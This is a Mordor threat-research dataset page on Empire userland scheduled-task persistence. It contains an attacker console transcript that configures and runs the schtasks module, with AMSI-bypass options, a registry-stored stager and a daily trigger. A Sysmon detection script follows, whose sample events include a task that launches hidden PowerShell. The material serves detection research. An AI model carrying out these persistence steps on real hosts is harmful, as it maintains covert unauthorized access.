Empire Userland Scheduled Tasks

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/03/19

Modification Date

2020/09/20

Tactics

['TA0003']

Techniques

['T1053.005']

Tags

['Local Scheduled Tasks']

Dataset Description

This dataset captures an Empire agent, running as a standard (non-admin) domain user, creating a local scheduled task to maintain persistence: the module stores the launcher script in the user's HKCU hive and registers a task (MordorSchtask) with a daily 09:00 trigger that re-launches it.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author    Name    Link

Simulation Plan

Environment     Tool Type    Module
------------    ---------    --------
Mordor shire    C2           schtasks

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            
3MWPS8L6 ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         7312   5/0.0    2020-09-21 07:12:36  http            

(Empire: agents) > interact 3MWPS8L6         
(Empire: 3MWPS8L6) > usemodule persistence/userland/schtasks
(Empire: powershell/persistence/userland/schtasks) > info

              Name: Invoke-Schtasks
            Module: powershell/persistence/userland/schtasks
        NeedsAdmin: False
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @mattifestation
  @harmj0y

Description:
  Persist a stager (or script) using schtasks. This has a
  moderate detection/removal rating.

Comments:
  https://github.com/mattifestation/PowerSploit/blob/master/Pe
  rsistence/Persistence.psm1

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        3MWPS8L6                  Agent to run module on.                 
  Listener         False                                 Listener to use.                        
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  DailyTime        False       09:00                     Daily time to trigger the script        
                                                        (HH:mm).                                
  IdleTime         False                                 User idle time (in minutes) to trigger  
                                                        script.                                 
  TaskName         True        Updater                   Name to use for the schtask.            
  RegPath          False       HKCU:\Software\Microsoft  Registry location to store the script   
                              \Windows\CurrentVersion\  code. Last element is the key name.     
                              debug                   
  ADSPath          False                                 Alternate-data-stream location to store 
                                                        the script code.                        
  ExtFile          False                                 Use an external file for the payload    
                                                        instead of a stager.                    
  Cleanup          False                                 Switch. Cleanup the trigger and any     
                                                        script from specified location.         
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/persistence/userland/schtasks) > set Listener http
(Empire: powershell/persistence/userland/schtasks) > set TaskName MordorSchtask
(Empire: powershell/persistence/userland/schtasks) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 3MWPS8L6 to run TASK_CMD_WAIT
[*] Agent 3MWPS8L6 tasked with task ID 1
[*] Tasked agent 3MWPS8L6 to run module powershell/persistence/userland/schtasks
(Empire: powershell/persistence/userland/schtasks) > 
SUCCESS: The scheduled task "MordorSchtask" has successfully been created.
Schtasks persistence established using listener http stored in HKCU:\Software\Microsoft\Windows\CurrentVersion\debug with MordorSchtask daily trigger at 09:00.

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/persistence/host/empire_schtasks_creation_standard_user.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |515  |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |199  |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |172  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |69   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |38   |
|MORDORDC.theshire.local    |Security                                |5156   |33   |
|MORDORDC.theshire.local    |Security                                |5158   |27   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |22   |
|MORDORDC.theshire.local    |Security                                |4658   |21   |
|WORKSTATION5.theshire.local|Security                                |5158   |18   |
|WORKSTATION6.theshire.local|security                                |5158   |18   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |17   |
|WORKSTATION6.theshire.local|security                                |5156   |16   |
|WORKSTATION5.theshire.local|Security                                |5156   |13   |
|MORDORDC.theshire.local    |Security                                |4663   |10   |
|MORDORDC.theshire.local    |Security                                |4656   |10   |
|MORDORDC.theshire.local    |Security                                |4690   |10   |
|MORDORDC.theshire.local    |Security                                |4672   |8    |
|MORDORDC.theshire.local    |Security                                |4627   |8    |
|MORDORDC.theshire.local    |Security                                |4624   |8    |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows
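The adversary view above shows the two host-side artifacts this module leaves behind: a powershell.exe agent writes the launcher script into the user's HKCU hive (Sysmon EventID 13, registry value set), then spawns schtasks.exe /Create to register the daily trigger (Sysmon EventID 1, process creation). A correlation query that joins those two events on the agent's process GUID is a tighter signal than either alone. The block below is an added example, not code from the Mordor project or from the Empire/PowerSploit module; it runs the same SQL shape as the notebook's spark.sql() calls against an in-memory sqlite3 table so it works offline. The field names (Hostname, EventID, Image, CommandLine, ProcessGuid, ParentProcessGuid, ParentImage, TargetObject) follow the Mordor Sysmon schema as an assumption, and the sample rows are constructed here, not taken from the dataset.

```python
"""Correlate a userland schtasks persistence chain over constructed Sysmon events.
Added example; not code from the Mordor project or from Empire/PowerSploit.
The sample rows and the GUID values are made up and are not dataset content."""
import re
import sqlite3

COLUMNS = ("Hostname", "EventID", "Image", "CommandLine", "ProcessGuid",
           "ParentProcessGuid", "ParentImage", "TargetObject")

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample events (assumed Mordor/Sysmon field names). Sysmon records
# HKCU writes under HKU\<SID>\..., which is why the per-user path looks like that.
EVENTS = [
    # EventID 1: the powershell agent spawns schtasks.exe to create the daily task
    {"Hostname": "WORKSTATION5.theshire.local", "EventID": 1,
     "Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": '"schtasks.exe" /Create /F /SC DAILY /ST 09:00 '
                    '/TN MordorSchtask /TR "powershell -NonI -W hidden -c ..."',
     "ProcessGuid": "{guid-schtasks}", "ParentProcessGuid": "{guid-agent}",
     "ParentImage": PS, "TargetObject": None},
    # EventID 13: the same agent process stores the stager under CurrentVersion\debug
    {"Hostname": "WORKSTATION5.theshire.local", "EventID": 13,
     "Image": PS, "CommandLine": None,
     "ProcessGuid": "{guid-agent}", "ParentProcessGuid": None, "ParentImage": None,
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\debug"},
    # Benign noise: an admin listing tasks from cmd, and an ordinary HKCU Run write
    {"Hostname": "WORKSTATION6.theshire.local", "EventID": 1,
     "Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": "schtasks.exe /Query /FO LIST",
     "ProcessGuid": "{guid-query}", "ParentProcessGuid": "{guid-cmd}",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe", "TargetObject": None},
    {"Hostname": "WORKSTATION6.theshire.local", "EventID": 13,
     "Image": "C:\\Windows\\explorer.exe", "CommandLine": None,
     "ProcessGuid": "{guid-explorer}", "ParentProcessGuid": None, "ParentImage": None,
     "TargetObject": "HKU\\S-1-5-21-2\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive"},
]


def load_events(events):
    """Load the events into an in-memory table named like the notebook's view."""
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.execute("CREATE TABLE mordorTable (%s)" % ", ".join(COLUMNS))
    conn.executemany(
        "INSERT INTO mordorTable VALUES (%s)" % ", ".join("?" * len(COLUMNS)),
        [tuple(e.get(c) for c in COLUMNS) for e in events])
    return conn


# p = process creation of schtasks.exe /Create launched from powershell.exe;
# r = a registry value set by that same powershell process (p.ParentProcessGuid)
# in a per-user hive. The join is what ties the task to the stored stager.
QUERY = """
SELECT p.Hostname AS Hostname, p.CommandLine AS CommandLine,
       p.ParentImage AS ParentImage, r.TargetObject AS TargetObject
FROM mordorTable p
JOIN mordorTable r
  ON r.Hostname = p.Hostname
 AND r.EventID = 13
 AND r.ProcessGuid = p.ParentProcessGuid
 AND r.TargetObject LIKE 'HKU\\%'
WHERE p.EventID = 1
  AND lower(p.Image) LIKE '%\\schtasks.exe'
  AND lower(p.CommandLine) LIKE '%/create%'
  AND lower(p.ParentImage) LIKE '%\\powershell.exe'
"""

# Pull the task name out of "/TN <name>" (quoted or bare) for the alert.
TASKNAME_RE = re.compile(r'/TN\s+"?([^\s"]+)', re.IGNORECASE)


def find_schtasks_persistence(conn):
    """Return one dict per correlated (task creation, registry stager) pair."""
    hits = []
    for row in conn.execute(QUERY):
        m = TASKNAME_RE.search(row["CommandLine"] or "")
        hits.append({
            "Hostname": row["Hostname"],
            "TaskName": m.group(1) if m else None,
            "TargetObject": row["TargetObject"],
            "ParentImage": row["ParentImage"],
        })
    return hits


if __name__ == "__main__":
    for hit in find_schtasks_persistence(load_events(EVENTS)):
        print(hit)
```

Only the WORKSTATION5 pair fires; the schtasks /Query from cmd.exe and the explorer.exe Run-key write on WORKSTATION6 are left alone. Two caveats when porting this to the notebook's spark.sql(): Spark SQL treats backslash as an escape character in string literals and LIKE patterns, so the backslashes need doubling there, and the join only works where ProcessGuid/ParentProcessGuid are present, which is the case for Sysmon EventID 1 and 13 but not for the Security channel's 4698 (scheduled task created) event, which needs the Other Object Access Events audit subcategory enabled before it appears at all.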